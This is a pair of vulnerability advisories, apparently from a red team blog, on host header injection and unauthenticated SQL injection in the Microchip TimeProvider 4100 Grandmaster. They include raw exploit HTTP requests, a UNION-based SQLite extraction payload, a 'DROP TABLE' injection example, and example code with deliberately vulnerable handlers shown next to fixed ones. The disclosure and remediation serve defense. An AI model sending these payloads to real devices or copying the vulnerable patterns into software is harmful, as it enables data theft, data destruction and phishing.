Monday, October 14, 2024

CVE-2024-43683: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - URL REDIRECTION TO UNTRUSTED SITE ('Open Redirect') – CWE-601

Proceeding with the analysis of the “Microchip TimeProvider® 4100 Grandmaster TP4100” device, it was possible to identify a Host Header Injection vulnerability.

TimeProvider 4100 Grandmaster Device

The device fails to properly validate the Host header in HTTP GET and POST requests. This allows attackers to craft requests with arbitrary Host values, which the system accepts and processes without verification.

In observed cases, replacing the legitimate Host header with a malicious domain (e.g., pentester.com) results in the device accepting the request and redirecting users to the attacker-controlled domain.

This issue can be exploited to:

  • Perform phishing attacks by redirecting users to malicious websites that appear legitimate

  • Bypass access controls or URL-based filters in certain environments

  • Facilitate cache poisoning or other injection-based attacks

Since the device does not verify that the Host header matches its own hostname or expected domain, it becomes vulnerable to these types of manipulations.

Exploitation Steps

Here’s how an attacker could exploit this vulnerability:

  1. Craft an HTTP request (GET or POST) targeting the TimeProvider 4100’s web interface.

  2. Replace the Host header with a malicious domain under the attacker’s control—for example: Host: pentester.com

  3. Send the request to the device.

  4. The device processes the request and redirects the user to the attacker-specified domain.

  5. The victim may unknowingly land on a malicious page designed to mimic the legitimate interface or capture credentials.

This redirection can occur in browsers or applications that use absolute URLs based on the Host header, making it particularly dangerous in environments where external links are passed through the device.

The following image shows an example of a request containing a custom Host header owned by a malicious user. It's also possible to verify that the browser automatically redirects to the specified domain:

Request RAW:

GET /dashboard HTTP/1.1
Host: pentester.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close

Recommendations:

  • Implement strict server-side validation of the Host header against an expected allowlist.

  • Reject or log requests with unexpected Host values.

  • Ensure any redirections or URL generations use fixed, server-side hostnames rather than user-supplied headers.

  • Apply firmware updates once an official patch is made available by Microchip.
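To make the first three recommendations concrete, here is an added example (not the TP4100 firmware's code) of a hypothetical redirect handler: a vulnerable version that builds its Location from the request's Host header, beside a hardened version that checks the Host against an allowlist and builds the URL from a fixed, server-side origin. The allowlist entries and canonical origin are constructed for the demo.

```python
from urllib.parse import urlsplit

# Constructed for the demo: hostnames this device answers to, and the fixed
# origin used to build absolute URLs (never derived from the request).
ALLOWED_HOSTS = {"tp4100.example.internal", "192.0.2.10"}
CANONICAL_ORIGIN = "https://tp4100.example.internal"


def normalize_host(host_header):
    """Return the lowercase hostname from a Host header value, or None if the
    value is missing or malformed. Optional port and IPv6 brackets are stripped."""
    if host_header is None or not host_header.strip():
        return None
    h = host_header.strip()
    try:
        parts = urlsplit("//" + h)
        if parts.netloc != h:   # a '/', '?' or '#' inside Host is malformed
            return None
        parts.port              # raises ValueError for a non-numeric port
        return parts.hostname   # already lowercased, brackets removed
    except ValueError:
        return None


def host_is_allowed(host_header):
    """Allowlist check the server should apply before any other processing."""
    hostname = normalize_host(host_header)
    return hostname is not None and hostname in ALLOWED_HOSTS


def vulnerable_redirect(host_header, path):
    """Vulnerable pattern: the Location header is built from the request's own
    Host, so whatever the client sent becomes the redirect target."""
    return "https://" + host_header + path


def safe_redirect(host_header, path):
    """Hardened pattern: unknown Host values are rejected (the caller answers
    400 and logs the value) and the redirect uses the fixed canonical origin."""
    if not host_is_allowed(host_header):
        return None
    # Only same-site relative paths are accepted as the redirect target.
    if not path.startswith("/") or path.startswith("//") or path.startswith("/\\"):
        path = "/"
    return CANONICAL_ORIGIN + path
```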

Conclusion:

This vulnerability highlights a common but serious oversight: trusting user-supplied HTTP headers without validation. Host header injection can be leveraged for phishing, redirection, and other malicious activities—all without requiring access or authentication.

Reporting Information:

CVE Identifier: CVE-2024-43683
CVSS Score: 6.1
Affected Versions: Firmware 1.0 through 2.4.7
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43683
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-improper-verification-of-host-header
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Thursday, October 10, 2024

CVE-2024-7801: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - UNAUTHENTICATED SQL INJECTION

A deep analysis of the "TimeProvider 4100 grandmaster" device firmware revealed a SQL Injection vulnerability, specifically within the get_chart_data web resource.
The vulnerability arises from the improper handling of the channelId parameter, which is inserted directly into an SQL query (SQLite) without sanitization or validation.

TimeProvider 4100 Grandmaster Device

More critically, the channelId parameter is used to dynamically specify the table name in the SQL FROM clause. This design flaw allows unauthenticated attackers to manipulate the query structure, leading to arbitrary SQL execution on the device.

Successful exploitation could allow a threat actor to:

  • Extract sensitive internal data

  • Enumerate or alter database contents

  • Potentially affect system behavior depending on how data is used by other services

The vulnerability can be exploited remotely and without authentication, significantly increasing the potential risk to exposed devices.

Exploitation Steps

An attacker could exploit this vulnerability using the following approach:

  1. Send a crafted HTTP request to the vulnerable get_chart_data web endpoint.

  2. Manipulate the channelId parameter to inject SQL syntax that alters the intended query logic.

    • Example: Supplying a payload such as channelId=temperature_data; DROP TABLE logs;-- may result in destructive behavior depending on backend protections.

  3. Receive response data containing unintended results or confirmation of executed SQL commands.

An example of a malicious SQL payload is provided below:

SELECT%20sql%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master%20WHERE%20type='table'%20LIMIT%201%20OFFSET%200--

Request RAW:

POST /get_chart_data HTTP/1.1
Host: [device IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 146
Origin: https://[device IP]
Referer: https://[device IP]/perfmon_synce_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

metric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=

1_status%20UNION%20 [malicious SQL payload] %20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1

Conclusion:

This vulnerability highlights the risks of dynamic query construction without proper input validation. The fact that the flaw is unauthenticated and affects a core web resource significantly elevates the impact and exploitability.
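As an added example (not the device's own code), the block below models a hypothetical get_chart_data handler over an in-memory SQLite database with constructed tables: the vulnerable version splices channelId straight into the FROM clause, while the hardened version accepts only an allowlisted channel table and binds the remaining values as parameters. Table names, rows and the allowlist are constructed for the demo.

```python
import sqlite3

# Allowlist of per-channel stats tables (constructed for the demo).
# A table name cannot be a bound parameter, so the request value must be
# mapped onto one of these, never spliced into the statement text.
CHANNEL_TABLES = {"tenMHz1", "tenMHz2"}


def make_db():
    """Constructed in-memory DB: channel stats plus a table that must not leak."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE tenMHz1(ts INTEGER, mtie_a REAL);
        INSERT INTO tenMHz1 VALUES (1, 0.5), (2, 0.7), (3, 0.9);
        CREATE TABLE tenMHz2(ts INTEGER, mtie_a REAL);
        CREATE TABLE user_secrets(name TEXT);
        INSERT INTO user_secrets VALUES ('admin-token');
    """)
    return db


def chart_data_vulnerable(db, channel_id, t_start):
    """Vulnerable pattern: channelId lands verbatim in the FROM clause, so a
    UNION in the parameter can read any table the web process can see."""
    sql = "SELECT ts, mtie_a FROM %s WHERE ts > %s" % (channel_id, t_start)
    return db.execute(sql).fetchall()


def chart_data_safe(db, channel_id, t_start):
    """Hardened pattern: channelId must equal an allowlisted identifier (quoted
    for defence in depth) and the time bound is type-checked and bound."""
    if channel_id not in CHANNEL_TABLES:
        raise ValueError("unknown channelId")
    sql = 'SELECT ts, mtie_a FROM "%s" WHERE ts > ? ORDER BY ts' % channel_id
    return db.execute(sql, (int(t_start),)).fetchall()


def safe_rejects(db, channel_id):
    """True when the hardened handler refuses the given channelId."""
    try:
        chart_data_safe(db, channel_id, "-1")
    except ValueError:
        return True
    return False
```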

Reporting Information:

CVE Identifier: CVE-2024-7801
CVSS Score: 6.3
Affected Versions: Firmware 1.0 through 2.4.7
Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-7801
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-unathenticated-sql-injection
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.